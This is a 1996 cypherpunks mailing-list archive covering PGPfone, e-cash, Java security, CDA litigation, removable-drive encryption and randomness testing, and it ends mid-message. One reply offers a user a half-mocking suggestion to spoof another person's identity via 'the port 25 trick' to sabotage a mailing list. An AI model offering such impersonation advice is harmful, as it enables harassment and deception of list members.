Subject: Re: New Beta Test of PGPfone available WINDOWS '95 Included!
Message-ID: <2.2.32.19960323204011.009396d4@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:49 PM 3/23/96 -0500, Ted Garrett wrote:

>>Will there ever be a Win32s version of PGPfone?  I have one of those systems
>>with non-(MS)DOS partitions that MS-DOS/Wind95 doesn't like, so until MS can
>>deal with the fact that people use other OSs, I'm staying clean of Win95.
>
>Windows95 doesn't complain at all about other operating systems resident on
your
>machine, nor does it invalidate partitions which it can't read.  You just
can't access
>the partitions.

Win95 does alter the Master Boot Record on the drive.  This tends to screw
up previously installed boot managers.  Reinstalling lilo (or whatever boot
manager you use) usually does the trick.  (The MBR changes do not seem to be
a requirement.  I have no idea why they do it.  Maybe to make sure that you
use *ONLY* Mr. Bill's OS.)

I get around the problem by having removable drives.  (Each one with a
different OS.)  Avoids having to deal with the chance of messing up all of
my operating systems at once...

---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sun, 24 Mar 1996 05:13:19 +0800
To: cypherpunks@toad.com
Subject: Re: LET'S ROCK!!!!
Message-ID: <199603232050.MAA06804@mail1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:26 AM 3/22/96 -0600, WThinker wrote:
> Ok, here is the situation.  I have a person mad at me in one of my mailing
> lists.  Turns out, this person was the owner of the mailing list!  Well now
> I'm stuck, knocked out of the list.  The owner can not see any of my mail,
> no matter how hard I try.  I need some ideas to eather get through to her,
> or really fuck up the mailing list.
>
> Any ideas?

Life is short.

Get a life.

Of course you could simply spoof the identity of someone else 
in order send some exit mail.  use the port 25 trick. A parting 
shot will work wonders, by alerting others that their views are 
likely to be censored, thus discouraging them from posting on 
the list, thus causing the list to die, but if you actually 
put serious work into this and make a big effort to keep up 
a conversation and keep on going and going then you are a 
total loon.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Garrett <teddygee@visi.net>
Date: Sun, 24 Mar 1996 02:17:11 +0800
To: weinberg@accessus.net (WThinker)
Subject: Re: LET'S ROCK!!!!
Message-ID: <2.2.32.19960323175759.0074962c@mail.visi.net>
MIME-Version: 1.0
Content-Type: text/plain


At 07:26 AM 3/22/96 -0600, you wrote:
>Ok, here is the situation.  I have a person mad at me in one of my mailing
>lists.  Turns out, this person was the owner of the mailing list!  Well now
>I'm stuck, knocked out of the list.  The owner can not see any of my mail,
>no matter how hard I try.  I need some ideas to eather get through to her,
>or really fuck up the mailing list.

Seems to me that you could set up a pseudonymous account, then mail the list owner from that account.  She'll get you first couple of messages before she realizes it's you.  If you can be persuasive enough in these messages that she'll re-instate you on the list, you're good to go.

If she doesn't decide to re-instate you, set up an alias somewhere, and subscribe to the list using that alias.

Fucking up the mailing list is NOT something you should even consider.  Childish and irresponsible behavior is seldom a means of gaining respect.
---------------------------------------------------------------------------------------------------------
Ted Garrett <teddygee@visi.net>  http://www.visi.net/~teddygee
"Those who desire to give up Freedom in order to gain
  Security will not have, nor do they deserve, either one."
					Thomas Jefferson




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Sun, 24 Mar 1996 02:38:51 +0800
To: cypherpunks@toad.com
Subject: Re: e$'s (mini-rant)
Message-ID: <9603231819.AA04841@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


  Jeff wrote:
>  <begin mini-rant>

Hi!
I do not know about monetary systems and US laws, but I think that a
national currency
has it's role. 

I also think that it should be backed by a physical agreed-on value such as
gold, to prevent
the government of the day to tamper with the monetary system.


But what I think is very wrong with the actual system is the govt 
control over all other systems.

Have you ever tried to raise capital for a technological venture lately?

The govt enforces with its own guns a monopoly in favor of certain peoples
we call
stock brokers.

The SEC and their counterparts in most countries is a nightmare to anybody
who has
a good idea, the knowhow to develop it and no taste for "smart" scheming
with money.

The SEC rules ultimate result is that it permits peoples to acquire money
without
accomplishing any productive work related to the creation of that money.

I do not mean to say that the broker job is wrong, but the government gun
that backs them
up is.

E-cash might be or might not be a violation of the current rules, I have no
ideas.
But I see infinite possibilities to finance small idea/knowledge rich and
capital poor 
ventures....

I just downloaded magic money yesterday night and played with it long past
bedtime.

JFA

 Public Key at http://w3.citenet.net/users/jf_avon
    Jean-Francois Avon <jf_avon@citenet.net> 
    2048 bits key ID:C58ADD0D  1996/03/01    
fingerprint=52 96 45 E8 20 5A 8A 5E  F8 7C C8 6F AE FE F8 91 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Sun, 24 Mar 1996 02:36:06 +0800
To: cypherpunks@toad.com
Subject: e-cash FAQ anywhere?
Message-ID: <9603231819.AB04841@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Could anybody tell me where I can find a FAQ or some primer on e-cash?

I recently played with magic money but I would like to learn more about 
the various concepts.

Thanks

JFA

 Public Key at http://w3.citenet.net/users/jf_avon
    Jean-Francois Avon <jf_avon@citenet.net> 
    2048 bits key ID:C58ADD0D  1996/03/01    
fingerprint=52 96 45 E8 20 5A 8A 5E  F8 7C C8 6F AE FE F8 91 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 24 Mar 1996 05:44:45 +0800
To: Gary Lee Jeffers <gjeffers@ns.htc.net>
Subject: Re: (X:x)e$ 's other use
Message-ID: <199603232131.NAA10965@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi, Gary - actually this comes up every 3-6 months.  There are
some fundamental problems with the using e$ as a new currency.

At 02:33 AM 3/22/96 -0600, you wrote:
>e$ would be a sound money replacement for the corrupt currency that
>every large state in the world currently pushes. Especially if e$
>can be redeemed in something of real value on demand.

E$ is a fine medium for exchanging certificates of whatever it is you're
trying to certify, just as paper with pictures of dead politicians is.
Printing paper is easy, and it's easy to add lots of zeros when you do.
Printing 1s and 0s is also easy, and there are plenty of zeros out there.
Digging shiny malleable ductile yellow metal out of the ground is harder.

The tough part, with all these media, is getting somebody to give you
real stuff in return for a certificate that claims to be worth 1000.
The three basic ways certificate-issuers have done this are
1) Guarantee that they'll give you stuff or services in return
2) Convince a lot of people to exchange stuff or services for them,
        so you can usually redeem them without going to the bank
3) Threaten to beat people up if they don't accept them.

Method 1 works if people trust you and you've got stuff to sell.
Subway tokens and postage stamps have been used as money because
most people want to ride subways and mail letters, and the
subway and mail-carrying companies were big enough that you'd
expect to be able to redeem them before the companies went out of business
(or you moved out of town), so you can spend some money safely.
Note that this method works both for stuff you have on hand,
like shiny metal, or for services you're promising to do later
and will have to get resources for.

Banknotes work because well-behaved banks only issue enough
promises to deliver shiny metal to cover the amount of metal they have;
if they start making more promises than they can deliver on,
the market gets annoyed at them and people stop accepting their paper
in return for goods and services, and stop giving them shiny metal
in return for convenient paper, and Method 2 fails for them.
But if banks keep their promises, people trust them, and they make money.
This works both in free markets and in government-controlled markets.
As long as the banks are _honest_ about their policies for issuing notes,
it doesn't matter if they're doing fractional reserve or printing
the stuff outright; you can decide how much to trust them,
or whether to do all your transactions with shiny metal.

Method 3 you'll recognize.  There'd be nothing wrong with the Federal 
Reserve if they only used methods 1 and 2; individual consumers can
decide whether to trust them not to print a lot more zeros than they should.
And they don't have a monopoly on currency - there are some kinds of
taxes that apply to some private currencies, but you can go into the
average bank today, ask them to write a cashier's check to someone
(and probably still to "bearer"), pay them, and they'll be happy to do it
for only a small commission, and American Express will do it as well.
And people will take their paper, though in the case of traveller's checks
it's sometimes a hassle to accept on an occasional basis.

On line, of course, it's tough to use metal as a way to pay people,
so technologies like e$ are necessary.  




#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissible."  - US government statement on China...

"SigFiles of Unusual Size?  I don't believe they exist!"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sun, 24 Mar 1996 05:54:38 +0800
To: cypherpunks@toad.com
Subject: Java questions
Message-ID: <Pine.SUN.3.91.960323133624.17748A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


There has been a lot of discussion on coderpunks about implementing 
cryptography in Java.  This got me thinking.  We don't see 
every C++ compiler using the same back end.  So why is 
everyone licensing Sun's Java implementation?  As a consequence of
this if there is a bug in Sun's implementation, then that bug 
exists in every Java implementation.  Imagine a future scenario 
where a virus/worm takes advantage of a single Java bug and 
infects 90% of all computers attached to the Internet overnight.
There may not be much we can do about this, but we should at 
least be more aware of the possibility.
 
On a more positive note, has anyone thought of writting a 
remailer server or client in Java?  It would be really nice if we 
could run or use a remailer by clicking a link on the web.
 
Wei Dai





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Garrett <teddygee@visi.net>
Date: Sun, 24 Mar 1996 03:05:23 +0800
To: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Subject: Re: New Beta Test of PGPfone available WINDOWS '95 Included!
Message-ID: <2.2.32.19960323184919.00763830@mail.visi.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:56 PM 3/22/96 GMT, you wrote:
>jis@mit.edu (Jeffrey I. Schiller) writes:
>>We have finally released a Windows '95 version of PGPfone. This release
>>includes PGPfone for Macintosh version 1.0b6 and PGPfone for Windows '95
>>version 1.0b1. Note: The Macintosh version does not talk to earlier versions.
>>However the Macintosh and Windows version talk to each other!
>
>Will there ever be a Win32s version of PGPfone?  I have one of those systems
>with non-(MS)DOS partitions that MS-DOS/Wind95 doesn't like, so until MS can
>deal with the fact that people use other OSs, I'm staying clean of Win95.

Windows95 doesn't complain at all about other operating systems resident on your
machine, nor does it invalidate partitions which it can't read.  You just can't access
the partitions.
---------------------------------------------------------------------------------------------------------
Ted Garrett <teddygee@visi.net>  http://www.visi.net/~teddygee
"Those who desire to give up Freedom in order to gain
  Security will not have, nor do they deserve, either one."
					Thomas Jefferson




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Aldrich <maldrich@grctechs.va.grci.com>
Date: Sun, 24 Mar 1996 03:54:17 +0800
To: cypherpunks@toad.com
Subject: Re: Digital Signature Inititiative
In-Reply-To: <c=US%a=_%p=msft%l=RED-76-MSG-960323000445Z-4522@red-07-imc.itg.microsoft.com>
Message-ID: <Pine.SCO.3.91.960323140256.1956A-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 22 Mar 1996, Stuart Theodore wrote:

<snip>

> * regarding the mac question - there already is a  version of Internet
> Explorer for the Macintosh, available for download at
> www.microsoft.com/ie. Microsoft is has already announced its committment
> to building cross-platform internet products.

If this is the case, then why did you discontinue Mac support for your 
own MAPI standard?  While the ability exists to bind cryptographic 
protocols onto your MS Mail a/o Exchange via MAPI (as we have done), you 
trashed MS Mail for the Mac.  Star Nine doesn't even have the ability to 
port MAPI onto the Mac, even though you sold them the rights to MS Mail 
server software for that platform.  You have crippled the 
interoperability of your so-called messaging standard between the Mac and 
Windows platform, thus preventing third party developers (such as myself) 
from being able to incorporate the use of different cryptographic engines 
seamlessly across your product line.

Now you say, "Microsoft is [sic] has already announced its committment      
 to building cross-platform internet products."  Excuse me, but this is 
exactly the same thing you used to say about cross-platform messaging 
products (before you woke up to the Internet).

Now, whenever I have to put together a messaging system or O/A 
environment that requires cryptographic protections, I tell my clients to 
avoid MS like the plague.  Hell, I'd rather work in VIM than deal with 
this "MS commitment" that turns out to be empty lies and marketing hype.

Forgive me if I, and any number of other people, assign no merit 
whatsoever to any so-called "commitment" from MS, particularly in regard 
to security and standards issues.

------------------------------------------------------------------------- 
|      Liberty is truly dead              |Mark Aldrich                 | 
|    when the slaves are willing          |GRCI INFOSEC Engineering     | 
|     to forge their own chains.          |maldrich@grci.com            | 
|        STOP THE CDA NOW!                |MAldrich@dockmaster.ncsc.mil | 
|_______________________________________________________________________| 
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     | 
|         and my employer gets no credit for them whatsoever.           | 
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Aldrich <maldrich@grctechs.va.grci.com>
Date: Sun, 24 Mar 1996 04:07:13 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: Re: NT's C2 rating
In-Reply-To: <199603230800.AAA24157@netcom6.netcom.com>
Message-ID: <Pine.SCO.3.91.960323142342.1956C-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 23 Mar 1996, Bill Frantz wrote:

> At  5:11 PM 3/22/96 -0600, Rick Smith wrote:
> >The big deal is that few vendors have tried to get NCSC evaluations.
> 
> We walked KeyKOS a long way down the path to a B2 rating.  Our investors
> refused to fund the estimated $1 million it would cost to do all the
> paperwork.  They felt there was no market for NCSC secure systems.  Perhaps
> others felt the same way.

Hopefully, with the Common Criteria replacing the Orange Book (pray, this 
year), you'll now be able to evaluate against a profile for a lot less 
money.  And, believe it or not, customers will actually get security 
products they need instead of another instance of the Bell-LaPadula model 
crafted to military specs.

------------------------------------------------------------------------- 
|      Liberty is truly dead              |Mark Aldrich                 | 
|    when the slaves are willing          |GRCI INFOSEC Engineering     | 
|     to forge their own chains.          |maldrich@grci.com            | 
|        STOP THE CDA NOW!                |MAldrich@dockmaster.ncsc.mil | 
|_______________________________________________________________________| 
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     | 
|         and my employer gets no credit for them whatsoever.           | 
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mch@squirrel.com (Mark C. Henderson)
Date: Sun, 24 Mar 1996 08:14:39 +0800
To: cypherpunks@toad.com
Subject: Re: protection on IoMega ZIP drives
Message-ID: <199603240002.QAA04583@squirrel.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mar 23, 17:28, JonWienke@aol.com wrote:
} The Syquest EZ drive (130MB twice as fast as the ZIP, a little cheaper
} too--around $200 for an internal drive and cartridge, with additional carts
} around $20, and a 1 GB version available for $500, + $100 / additional
} cartridge) comes in IDE, SCSI, and parallel flavors.  You can get an internal
} IDE drive and DOS doesn't know or care that you can replace the cartridge.
}  You can DoubleSpace the drive, (I have personally done this) so you should
} be able to SecureDrive it too.  It is a full fledged IDE (or SCSI) drive.

The SCSI version of the ZIP drive is a "fully fledged" SCSI drive. I 
use one on a Sun workstation without any special software/drivers, 
and secure the ZIP disks with CFS. It isn't terribly fast, but one 
hardly notices when one is dealing with the overhead of encrypting 
and decrypting the data anyway. 


-- 
Mark Henderson -- markh@wimsey.bc.ca, mch@squirrel.com, henderso@netcom.com
ViaCrypt PGP Key Fingerprint: 21 F6 AF 2B 6A 8A 0B E1  A1 2A 2A 06 4A D5 92 46
unstrip for Solaris, Wimsey crypto archive, TECO, computer security links,
change-sun-hostid, Sun NVRAM/hostid FAQ - http://www.squirrel.com/squirrel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Sun, 24 Mar 1996 06:48:28 +0800
To: cypherpunks@toad.com
Subject: Re: protection on IoMega ZIP drives
Message-ID: <960323172854_254143352@emout05.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-03-23 05:19:55 EST, it was written for God and everyone
to see:

>> Has anyone tried SFS?  It should work on the zip drive, though I've not 
>> tried it (yet)...
>
>If I recall some recent threads on alt.security.pgp (or sci.crypt?), 
>SFS doesn't work on ZIP drives (since ZIPs use the parallel port...).
>
>[Or do ZIPs use Scuzzies and the people who had problems were just 
>too lame to figure out that they had to load the driver before SFS?]

The Syquest EZ drive (130MB twice as fast as the ZIP, a little cheaper
too--around $200 for an internal drive and cartridge, with additional carts
around $20, and a 1 GB version available for $500, + $100 / additional
cartridge) comes in IDE, SCSI, and parallel flavors.  You can get an internal
IDE drive and DOS doesn't know or care that you can replace the cartridge.
 You can DoubleSpace the drive, (I have personally done this) so you should
be able to SecureDrive it too.  It is a full fledged IDE (or SCSI) drive.

Jonathan Wienke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 24 Mar 1996 12:34:49 +0800
To: John Young <cypherpunks@toad.com
Subject: Re: DAZ_zle
Message-ID: <m0u0h31-0008zrC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:53 PM 3/21/96 -0500, John Young wrote:
>   Foreign Affairs, March/April, 1996, features two policy
>   essays on "The Information Edge: A technological change is
>   transforming the nature of power and the United States is
>   clearly in the lead."

[deleted]

> He observes that misunderstanding of
>   revolutionary technology all too often has had unexpected,
>   disastrous, consequences: "A revolution in military affairs
>   is under way. It will require changes of a magnitude that
>   military people still do not completely grasp and political
>   leaders do not fully imagine."

Sounds like this guy has been reading my stuff.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: webmaster@pepsi.com
Date: Sun, 24 Mar 1996 10:42:31 +0800
Subject: Pepsi World - $25,000!
Message-ID: <199603240210.UAA04181@plwipc00.xweb.eds.com>
MIME-Version: 1.0
Content-Type: text/plain


Hey Squatter!

Have you found the hidden "hot" spots and registered to win the Shaq/Pepsi
World's Slammin' Techno Dream Contest?  Deadline to enter is March 31st,
only a few days away.

Don't miss out on your chance to win a $25,000 Gateway computer shopping
spree and a trip to Orlando, Florida to meet Shaq and catch the Magic in
action.

All ya gotta do is find the hidden "hot" spots.  Seem impossible?  Well,
here are a couple of hints:


"Shaquille O'Neal is his name,
Movies and basketball are his game.
So cruise by La La Land or Adrenalin to give your luck a try,
And find the ball that Shaq has left behind."

"Twinkle, twinkle little star,
25 grand could go real far..."

Good luck!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sun, 24 Mar 1996 10:13:43 +0800
To: cypherpunks@toad.com
Subject: Re: Free speech debate on MSN Encarta
In-Reply-To: <v0213051fad7930c47107@[192.168.69.70]>
Message-ID: <Pine.LNX.3.91.960323205056.793A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 23 Mar 1996, Joe Block wrote:

> This is easily done from a technical standpoint.  There is a set of patches
> for the CERN server that lets you have it automatically delete
> advertisments from certain prominent sites (used to be called NoShit, I
> heard they changed the name) when you're running in proxy mode.  You can
> even have it change profanity into "EXON EXON" on the fly.  Running
> something like this is probably a good thing for the ISP as running a cache
> will allow them to get more mileage out of their net connection.
> 
> However, I don't think it likely that many ISPs will go this route from a
> liability point of view - if some parent is paying them to filter out smut,
> and little Zippy finds a brand new x-rated site, chances are some irate
> parent will sue them.  With the proliferation of new pages, it is
> impossible for anyone to keep up, unless the authors voluntarily include
> some smutscan codes in their pages.

Couldn't the proxy be configured to deny access to all "unrated" pages?
Of course, this would mean that some kind of standardized web page rating
system be devised; however, I think there are already several proposals for
rating schemes.  BTW, does anyone know how such a proxy system could be
used in all Internet traffic, not just the web.  It is not very difficult
to get a gopher client or telnet client to communicate with a web server,
bypassing any access restrictions.

ObCrypto: The next step would be a rating system using digital signatures
and the proxy software being setup to trust certain signatures more than
others.

- --Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
"The concept of normalcy is just a conspiracy of the majority" -me


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMVSsCbZc+sv5siulAQFJWQP/cA4Mmciv8u6InH/8cXU9aq36qLCKVUQT
Y/uhpWJXfWd1gdv8+TanIYFj6oSoLSMCmqk/Q71bICajajrz1znyyNWT+S0X1hE/
maXQriu5CW1bj7ncA6L9Eb8Snk95ARiOSE2lPlfTcKq0jOwxsDVD6QrliBrYHpuW
AuW5Ml57JUE=
=z174
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sun, 24 Mar 1996 12:05:35 +0800
To: cypherpunks@toad.com
Subject: CDA Court Challenge: Day #2
Message-ID: <clJ=z_600YUvIOJstb@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


The DoJ also quizzed Donna Hoffman about anonymous remailers. They
wanted to make sure that she wasn't an expert on them, had conducted no
studies of remailers, and had collected no statistics on their use.

-Declan



-----------------------------------------------------------------------------
                           The CDA Challenge, Day #2
-----------------------------------------------------------------------------
         By Declan McCullagh / declan@well.com / Redistribute freely
-----------------------------------------------------------------------------

March 22, 1996


PHILADELPHIA -- At 2:21 pm today, one of the judges hearing our
challenge to the Communications Decency Act finally "got it."

"The folks in Luxembourg don't give a damn what our laws are. So my
son, who's 10, can still view 'Sexy European Girls?'" asked U.S.
District Court Judge Stewart Dalzell.

"That's correct," replied Scott Bradner of Harvard University, who
took the stand today to describe net.technology. Bradner told me
afterwards he thought Friday's hearing went well -- he had come to
Philadelphia to testify because this "is such an important issue."

Judge Dalzell's remark hints that he, at least, is starting to
understand the Internet -- and the consequences of the court's
eventual ruling. This comes not a picosecond too soon for those 
of us who have been fidgeting in our seats, wincing as Department
of Justice attorneys misuse technical terms and hoping the judges
can sort through the cyberconfusion in just six days of hearings.

Dalzell has a keen sense of humor and seems sympathetic to our
arguments. In fact, I'd guess he's been doing some out-of-court
web-surfing himself. In an _astounding_ question at the end of the
day, he asked Bradner: "Isn't it true that the exponential and
incredible growth of the Internet came about because the government
kept their hands off of it?"

Bradner gladly agreed. (What else would he say?)

The other two judges aren't quite as reflective. In an incomprehensible
decision last month, Judge Ronald Buckwalter granted us only a _partial_
restraining order preventing the Feds from enforcing the CDA. 

Now he's justifying his original mistake by taking a critical stance
during this hearing -- that is, when he's not dozing. During one of
his more alert moments, Buckwalter asked if labeling all online
content is possible: "Your problems are technical and financial? If
thse problems are solved and we agree on the definition of indecent,
is it possible?" "Yes, it is," our witness replied. Buckwalter also
asked earlier: "What do you mean by saying the Internet is a very
democratic medium? Isn't there someone who steers discussion?" As
proof, he held up a copy of a recent Atlantic magazine article that
claimed the most popular USENET newsgroups are moderated and are
therefore "quasi-authoritarian."

I suggested to our attorney, Chris Hansen from the ACLU, that he
clarify what percentage of newsgroups were moderated. On redirect,
Hansen posed that question to Donna Hoffman of Vanderbilt University.
She replied that most newsgroups are unmoderated. Later, Bradner of
Harvard University added that moderated newsgroups amount to less
than 10 percent of the total.

Dolores Sloviter is the third judge on the panel. As the chief judge
of the U.S. Third Circuit Court of Appeals, she penned a sparkling
decision upholding free expression in a phone sex case. In this
hearing, Sloviter's questions are the most pointed and incisive. When
Robert Cronenberger of Pittsburgh's Carnegie Library was testifying,
Sloviter asked him if under the CDA "would something have to be
removed from your collection?" Cronenberger replied: "We don't know.
We would be afraid that someone might find something indecent or
patently offensive."

The Department of Justice attorneys are an interesting lot. Jay Baron
is a short, heavyset man who tries hard to land roundhouse punches
during cross-examination but instead comes across as prone to
malapropisms. I think he was the DoJer who confused <http://www.eff.org/>
with <http://www.itef.org/> and "ISP" with "IP address." Before the
hearing resumed for the afternoon, I introduced myself to him. He
recognized me as a plaintiff and said he included one of my articles
on Marty Rimm as evidence (!) and used it during depositions.
<http://www.cs.cmu.edu/~declan/rimm/>

Tony Coppolino is more reserved and didn't say much when we chatted,
except to say that his office is busy enough with this case that they
won't be sending anyone to the Computers, Freedom and Privacy
conference next week.

I was impressed by the poise of Patricia Rosado, the DoJ's point
person on porn. Yesterday she floated the MacKinnonesque theory that
porn is harmful not just to minors, but also to women. Today she
greeted our witnesses with a barbed, stinging cross-examination.

Unfortunately for Rosado, she was up against Cronenberger, a likable
gent who came across as a traditional librarian close to the judges'
own ages -- not a net.geek like Donna Hoffman and Scott Bradner. (At
one point, Judge Sloviter demanded that Bradner explain URLs and
linking in English, not net-ese.)

The judges gladly related to Cronenberger's description of the Net as
a library -- finally, something they could grasp! The ACLU's Chris
Hansen expanded on this in a brilliant redirect, pointing out that the
concept extends beyond that of a traditional library, allowing a user
to link "from the fourth floor of Wiedner Library in Boston to the
third floor of the Carnegie Mellon University library in Pittsburgh."

Rosado from the DoJ rallied with questions like:

  DoJ: "You can do a keyword search on the seven dirty words?"
  DoJ: "Would a search on Abraham Lincoln turn up articles about sex?"
  R.C.: "I've read many articles about his sex life, or lack
         of sex life.
  DoJ: "Would a search on travel turn up articles about sex?"
  DoJ: "Would a search on geology turn up articles about sex?"
  R.C. "Only if rock is put together with roll!" <laughter>)
  DoJ: "Would a search on food turn up articles about sex?"
  DoJ: "You exercise discretion as to what you make available. You don't
        carry everything, do you?"
  DoJ: "You select materials that reflect the local community standards?"

Not surprisingly, the DoJ is trying to keep the hearing focused on
porn and sex. (At least it keeps Buckwalter awake!) Not the truly
extreme stuff that obscenity laws already ban online, but the softcore
Playboy-style cyberpix that would be permitted in the absence of the
CDA. The Justice Department asked Vanderbilt's Hoffman:

  DoJ: "You stated in your deposition that you were generally familiar
        with the web page called Bianca's Smut Shack?"
  Judge Dalzell immediately looked up, startled: "Bianca's WHAT?"
  DoJ: "Bianca's SMUT Shack."
  Judge Dalzell: "Oh, okay."

Other DoJ questions included a passing reference to would-be cyberporn
researcher Marty Rimm, who claimed that pornographers were using the
Net to recruit customers. (Last month, the DoJ attached Rimm's study
as an exhibit in their response to our complaint and cited it as
evidence of the pervasiveness of nasty stuff on USENET.) Some examples:

  DoJ: "You will concede, will you not, that this law will not have a
        profound adverse effect [on password-protected smutty sites]?"
  DoJ: "Pornographers are using USENET newsgroups to advertise, are
        they not?"
  DoJ: "Tell us about bots and spiders."
  Judge Dalzell, trying hard: "That's an acronym, right?"

My fellow plaintiffs are wonderful. Kiyoshi Kuromiya testified the
first day, followed by Patricia Nell Warren. Warren and I had dinner
on Thursday with Jonathan Wallace of the Ethical Spectacle; we talked
about the political and social forces behind the push for the CDA. I
asked Wallace why he came down from New York City -- he told me
because "this is the most important free speech case in 60 years."

Today I sat next to the DoJ's net.experts, who kept leaning forward to
whisper technical data into the ears of the Justice Department's
attorneys. One of the two experts was from Brigham Young University.
The other was Steve Nesbitt from the Department of Defense. One or
both likely will be testifying as expert witnesses for the DoJ, but
Justice isn't releasing the list until April 3.

Stay tuned for more reports.


-----------------------------------------------------------------------------

We're back in court on 4/1, 4/12, 4/15, and 4/26. The DoJ will be
taking depositions from our remaining witnesses the week of March 24.

For more information and breaking updates, check out:
  http://fight-censorship.dementia.org/top/

To subscribe to the fight-censorship announcement list, send email with 
"subscribe fight-censorship-announce" in the body to:
  majordomo@sojourn.com

Other relevant web sites:
  http://www.eff.org/
  http://www.cs.cmu.edu/~declan/rimm/
  http://www.cdt.org/
  http://www.aclu.org/

-----------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Sun, 24 Mar 1996 06:46:41 +0800
To: cypherpunks@toad.com
Subject: Noise sphere graphical tests of randomness
Message-ID: <199603232243.RAA07378@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain




I've got a short program for the PC (w/TPascal source) that plots a 
noise sphere from a file of (pseudo) random data, if anyone is 
interested.  Requires a VGA card that handles mode 5Fh (640 x 480, 
256 color) though the source can be eaily recompiled to use something 
else, or standard Borland Graphics drivers.

Send a reply with the subject "send nsphere" or check  ftp.funet.fi 
in the /pub/crypt/random directory in a few days [the ftp site would be
easier on my mailer ;]

The source has a brief explanation of what noise spheres are and a 
reference to the Pickover article the program was based on.

The source code is not copyrighted, and it would be nice to see it ported to
other systems, or maybe a portable C version that writes the output to a
.PCX file in RBG(?). [I'm not that fluent in C to write one...]

I've gotten some *very* interesting results.  Raw samples collected 
from fast timings between Windows message broadcasts do nicely with 
some of the randomness tests (compressability, Maurer, chi-sq) but 
clearly plots a spiral. 

Raw samples from the keyboard don't do as nicely in other tests (~50%
compressability, <6 bits/byte Maurer, and "non-random" in chi-squared] but
in the plot no discernable pattern shows up.... similar to plotting the
output from /dev/urandom [even when /dev/urandom was configured *not*
to use keyboard...]

Needless to say this will affect sampling methoids in the next version of
NOISE.SYS.

take care,

  Rob

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 24 Mar 1996 15:32:21 +0800
To: cypherpunks@toad.com
Subject: Re: detweiling
In-Reply-To: <v02120d0aad79c1c4b7ce@[199.0.65.105]>
Message-ID: <Pine.SUN.3.91.960323224026.5638D-100000@elaine30.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 23 Mar 1996, Robert Hettinga wrote:

